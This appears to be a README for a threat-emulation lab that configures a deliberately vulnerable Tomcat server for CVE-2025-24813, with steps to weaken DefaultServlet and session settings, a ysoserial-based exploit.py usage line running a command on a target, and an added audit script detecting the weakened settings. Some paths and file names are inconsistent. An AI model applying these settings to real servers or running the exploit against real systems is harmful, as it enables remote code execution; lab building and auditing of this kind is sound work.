This repo provides step-by-step instructions for rapidly deploying Tomcat v9.0.90 with java 25.0.1 2025-10-21 LTS on Windows Server 2019 Standard for a cyber security threat emulation exercise. `exploit.py` uses ysoserial-all.jar to build a payload with the CommonsCollections6 gadget chain, which the server later deserialises using classes from the commons-collections-3.2.1.jar dependency in `%CATALINA_HOME%\webapps\ROOT\WEB-INF\lib`.
- Download Tomcat v9.0.90:

```powershell
Invoke-WebRequest -Uri "https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90-windows-x64.zip" -OutFile "apache-tomcat-9.0.90-windows-x64.zip"
Expand-Archive -Path "apache-tomcat-9.0.90-windows-x64.zip" -DestinationPath "C:\"
```

- Download java 25.0.1 2025-10-21 LTS (ZIP version):

```powershell
Invoke-WebRequest -Uri "https://download.oracle.com/java/25/archive/jdk-25_windows-x64_bin.zip" -OutFile "jdk-25_windows-x64_bin.zip"
Expand-Archive -Path "jdk-25_windows-x64_bin.zip" -DestinationPath "C:\"
```

- Download the commons-collections dependency:

```powershell
mkdir C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
cd C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
Invoke-WebRequest -Uri "https://repo1.maven.org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar" -OutFile "commons-collections-3.2.1.jar"
```

- Setting up the Environment Variables
  1. Click on Start
  2. Type "edit the system environment variables"
  3. Create two new System Variables named
     - `JAVA_HOME` with value `C:\jdk-25.0.1`
     - `CATALINA_HOME` with value `C:\apache-tomcat-9.0.90`
  4. Edit the System Variable named `Path`, and add the following values:
     - `%JAVA_HOME%\bin`
     - `%CATALINA_HOME%\bin`
- Creating a service for auto startup:

```powershell
C:\apache-tomcat-9.0.90\bin\service.bat install Tomcat9Server
Set-Service -Name "Tomcat9Server" -StartupType Automatic
Start-Service -Name "Tomcat9Server"
```
- Open `tomcat-users.xml` in the `tomcat-9.0.90\conf` folder and add the following BEFORE `</tomcat-users>`:

```xml
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
```
- Open `context.xml` in the `tomcat-9.0.90\conf` folder and replace ALL content with the following:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<!-- The contents of this file will be loaded for each web application -->
<Context>
  <Manager className="org.apache.catalina.session.PersistentManager" maxIdleBackup="1" saveOnRestart="true" processExpiresFrequency="1">
    <Store className="org.apache.catalina.session.FileStore"/>
  </Manager>
</Context>
```
- Open `web.xml` in the `tomcat-9.0.90\conf` folder, search for DefaultServlet and replace the entire `<servlet></servlet>` block with the following:

```xml
<servlet>
  <servlet-name>default</servlet-name>
  <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
  <init-param>
    <param-name>debug</param-name>
    <param-value>0</param-value>
  </init-param>
  <init-param>
    <param-name>listings</param-name>
    <param-value>false</param-value>
  </init-param>
  <init-param>
    <param-name>readonly</param-name>
    <param-value>false</param-value>
  </init-param>
  <load-on-startup>1</load-on-startup>
</servlet>
```
- Restart your server with PowerShell:

```powershell
shutdown.bat
startup.bat
```
- If you can't connect to the web server externally, it may be blocked by Windows Firewall. Configure your firewall to allow the connection:

```powershell
New-NetFirewallRule -DisplayName "Tomcat9Server" -Direction Inbound -Protocol TCP -LocalPort 8080 -Action Allow
```

- Congrats! You just enabled a vulnerable Tomcat server with Java deserialization capabilities through commons-collections-3.2.1.jar, session persistence via FileStore, and disabled readonly protection in DefaultServlet (web.xml), making it susceptible to CVE-2025-24813 exploitation via ysoserial payloads. Throw in some legit-looking `index.html` in `C:\tomcat-9.0.90\webapps\ROOT` to make it look fancier.
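To confirm which of the three weakened settings above are actually in place on a given install (or, on a production box, that none of them are), here is an added audit script; it is not part of this repo or of Apache Tomcat, and the `WEB_XML`, `CONTEXT_XML` and `LIB_JARS` inputs are constructed samples of the edits described in this README.

```python
# Added audit script, not from the original repo or Apache Tomcat: it parses
# conf/web.xml and conf/context.xml and reports the three settings this lab
# weakens. The inputs at the bottom are constructed samples of those edits.
import xml.etree.ElementTree as ET

DEFAULT_SERVLET = "org.apache.catalina.servlets.DefaultServlet"
PERSISTENT_MANAGER = "org.apache.catalina.session.PersistentManager"
FILE_STORE = "org.apache.catalina.session.FileStore"

def default_servlet_readonly(web_xml):
    """Return DefaultServlet's 'readonly' init-param ('true' if unset, Tomcat's default)."""
    # {*} matches any namespace, since Tomcat's web.xml declares a default one.
    for servlet in ET.fromstring(web_xml).iterfind(".//{*}servlet"):
        if servlet.findtext("{*}servlet-class", "").strip() != DEFAULT_SERVLET:
            continue
        for init in servlet.iterfind("{*}init-param"):
            if init.findtext("{*}param-name", "").strip() == "readonly":
                return init.findtext("{*}param-value", "true").strip().lower()
    return "true"

def session_store_class(context_xml):
    """Return the Store className under a PersistentManager, or None for in-memory sessions."""
    for mgr in ET.fromstring(context_xml).iter("Manager"):
        if mgr.get("className") == PERSISTENT_MANAGER:
            store = mgr.find("Store")
            return store.get("className") if store is not None else None
    return None

def audit(web_xml, context_xml, lib_jars):
    """Return the set of weakened settings present; an empty set means none of the three."""
    found = set()
    if default_servlet_readonly(web_xml) == "false":
        found.add("readonly=false")       # DefaultServlet accepts PUT/DELETE
    if session_store_class(context_xml) == FILE_STORE:
        found.add("FileStore")            # sessions are deserialised from files on disk
    if any(j.lower().startswith("commons-collections-") for j in lib_jars):
        found.add("commons-collections")  # gadget-chain library on the webapp classpath
    return found

# Constructed samples mirroring this README's conf/web.xml and conf/context.xml edits.
WEB_XML = f"""<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"><servlet>
<servlet-name>default</servlet-name><servlet-class>{DEFAULT_SERVLET}</servlet-class>
<init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
</servlet></web-app>"""
CONTEXT_XML = f"""<Context><Manager className="{PERSISTENT_MANAGER}">
<Store className="{FILE_STORE}"/></Manager></Context>"""
LIB_JARS = ["commons-collections-3.2.1.jar"]  # contents of WEB-INF/lib after the download step

if __name__ == "__main__":
    print(sorted(audit(WEB_XML, CONTEXT_XML, LIB_JARS)))
```

On a real install, read the two files from `%CATALINA_HOME%\conf` and list `webapps\ROOT\WEB-INF\lib` to feed the same three arguments.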
- Open `C:\apache-tomcat-9.0.90\conf\web.xml` with Notepad and search for `<Connector port=`. You may uncomment the block and add in your own .pfx path. Below is an example of adding a cert.pfx in a newly created ssl folder, with no password, running HTTP/1.1:

```xml
<Connector port="443"
           protocol="org.apache.coyote.http11.Http11NioProtocol"
           maxThreads="150"
           SSLEnabled="true"
           scheme="https"
           secure="true">
  <SSLHostConfig>
    <Certificate certificateKeystoreFile="C:\tomcat-9.0.90\conf\ssl\cert.pfx"
                 certificateKeystorePassword=""
                 certificateKeystoreType="PKCS12" />
  </SSLHostConfig>
</Connector>
```
- Add a firewall rule if required:

```powershell
New-NetFirewallRule -DisplayName "Tomcat9HTTPSServer" -Direction Inbound -Protocol TCP -LocalPort 443 -Action Allow
```

- Cloning `exploit.py`
```shell
git clone <this-repo-url>
cd CVE-2025-24813
pip install requests
```
- Checking that you have java, and downloading ysoserial from GitHub:

```shell
java --version
curl -L -o ysoserial-all.jar https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
```
- Usage example:

```shell
python exploit.py -t http://<target IP>:8080/ -c "cmd.exe /c calc.exe"
```
- On each execution of `exploit.py`, two session files are created, one in `C:\tomcat-9.0.90\webapps\ROOT` and one in `C:\tomcat-9.0.90\work\Catalina\localhost\ROOT`, each with a randomised name. The `.session` file within the work folder should be deleted a few seconds after execution.